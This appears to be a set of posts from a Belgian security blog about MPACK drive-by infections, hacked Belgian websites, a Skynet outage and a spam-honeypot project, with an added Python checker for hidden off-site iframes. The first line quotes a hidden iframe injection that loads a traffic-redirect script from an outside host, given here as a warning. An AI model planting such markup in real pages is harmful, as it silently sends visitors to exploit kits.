<IFRAME name='StatPage' src='---------.555traff.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>
This is all that has to be inserted in a comment, a forum, a blog or a website, or behind a picture, to redirect you to a website infected with MPACK, which will test your visitors against a whole series of vulnerabilities that most of them won't be defended against. As last week was very rich in new usable exploits against popular software, upgrades of MPACK will give the botnet users even more possibilities.
And every website with a feature or vulnerability that lets others insert HTML code can become part of this list of infected websites, which grows every day.
WordPress users should upgrade their version very quickly; they are vulnerable.
Apache users should know that a vulnerability in one of the sites can also make all the other sites hosted on the same server vulnerable if their Apache is not sufficiently secured.
And there is also a problem with vBulletin, cPanel, etc.
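A way for a site owner to check stored comments or page templates for this kind of injection, as an added example that is not part of the original post: it flags iframes that are hidden (display:none or a few pixels in size) and load from a host other than the site's own. The host names, the 10-pixel threshold and the sample page are assumptions constructed for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that hide an element from the visitor.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _tiny(value, limit=10):
    """True when a width/height attribute is a pixel count of `limit` or less."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= limit

class HiddenIframeFinder(HTMLParser):
    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser lowercases tag names, so <IFRAME> matches
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("tiny-size")
        # Relative URLs have no hostname, so they stay on the site itself.
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        same_site = host == self.own_host or host.endswith("." + self.own_host)
        if reasons and host and not same_site:
            self.findings.append({"line": self.getpos()[0], "host": host, "reasons": reasons})

def find_hidden_iframes(html, own_host):
    """Return one finding per hidden, off-site iframe in `html`."""
    finder = HiddenIframeFinder(own_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: a visible video embed, a hidden same-site frame,
# and an injected frame shaped like the one quoted above (example.net host).
SAMPLE_PAGE = """<html><body>
<p>Great post, thanks!</p>
<iframe src="https://video.example.org/embed/1" width="560" height="315"></iframe>
<iframe src="/ads/frame.html" width="1" height="1" style="display:none"></iframe>
<IFRAME name='StatPage' src='http://stats.example.net/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>
</body></html>"""

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE_PAGE, "blog.example.com"))
```

Only the last iframe of the sample is reported; the visible embed and the hidden same-site frame are left alone, which keeps the check usable on pages with legitimate embeds.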
Here we go again. Once more a new feature (large photos) has been added without any real load testing, and now they have found that the load it causes is far too high and is undermining the whole infrastructure, so they have to pull the emergency brake.
It also seems rather incomprehensible to me that not only was there no proper pretesting, but apparently there are also no professional, good open-source or well-configured real-time monitors, or nobody looks at them. Otherwise they could have seen right away, preventively, that things were going wrong.
So the problem lies with the photos. But heavy photos do not really need to sit on a blog infrastructure. They should be delivered to the blog service from a photo-hosting service. And Skynet has just such a service, but unfortunately there is no integration at all with the functionality of the blogs. With a file-hosting environment you can solve all those problems much more easily. But if they dawdle over the integration, the whole castle can of course fall apart much more easily. The whole is more than the sum of its parts, only at Skynet there is no whole yet, let alone a sum of the parts.
There is work to be done, I would think.
Now where is that blank sheet again?
The honeypot project lets every website or domain owner in the world cooperate, with some simple code, to catch spam and malware. It then tries to list the responsible IP addresses.
For Belgium it is succeeding in getting even more spamzombies than ever before. But it will work for any ISP in any country.
the list of Belgian spamzombies or misused mailservers is here
The RSS feed for the Belgian infected spamzombies (mostly)
Please participate if you can
or if you work at an ISP help clean up the mess afterwards
Just back from holidays and more busy with backing up stuff than getting back to the actual dire state of internet security in Belgium.
When the lone stupid young hacker was arrested the day after he hacked the forgotten website of the police (during lunch hours) he surely got the attention of the press - and as usual the press fell silent afterwards. The press is only interested in the picture and the comical story effect of the act, and is not asking any critical questions.
You can ask questions like
- Are there many sites hacked in Belgium every week? Yes, there are. You can find a history and a fresh line-up on http://be-hacked.skynetblogs.be
- Is somebody actively informing those webmasters that they are hacked and that they should clean up their act? No. I have done it sometimes, but it sometimes takes too much time or even gets an aggressive response. The reason is that nobody is taking any responsibility for anything here.
- Are websites that are hacked and stay hacked taken offline or blocked by the ISPs to protect their users? No, and even if Google is starting to block some hacked websites, they don't do it for all, even if I find them based on search words I use in Google.
- Are hackers being prosecuted, or are ISPs trying to block access to and from control or attack centers on Belgian websites? Sure not, who cares?
So the SANS-formed technician from the Belgian internet crime center didn't have too much trouble finding the stupid press-hungry hacker, and so he did what he had to do in the time frame in which it had to be done.
Let it be a lesson for anybody who reads this blog and finds security materials and guides here. You cannot under any circumstances use any of this stuff against any Belgian infrastructure for which you don't have the explicit approval of the owner of the website and maybe of the infrastructure (if for example you are trying a DDoS or a DNS attack).
For those who remember redattack. Well he is at home without work.
In Belgium there is no protection or exception for security researchers nor for white hackers, and as far as I know there is also no sure way you can inform the people responsible about security holes you have stumbled upon without putting yourself in danger. Maybe this is one thing to do for the next government. Or for the Computer crime center to reach out to the community.
Next to this blog I have adapted the Furlfeed. It will now take the latest 100 IT security articles I have passed over and furled.
In the http://be-hacked.skynetblogs.be you will only find one post with a Furlfeed to hacked websites. The copy of the hack itself you can find by clicking on the sign after the description. Some beautiful ones.
In the http://ebooks.skynetblogs.be you can now search directly into a collection of already more than 800 articles and books on my page in scribd.com. I have also placed a FURLfeed with links to sites and pages with lots of documents and articles.
In the http://freeware.skynetblogs.be you can now also find a FURL feed of sites with freeware; most of it is security and hacking stuff.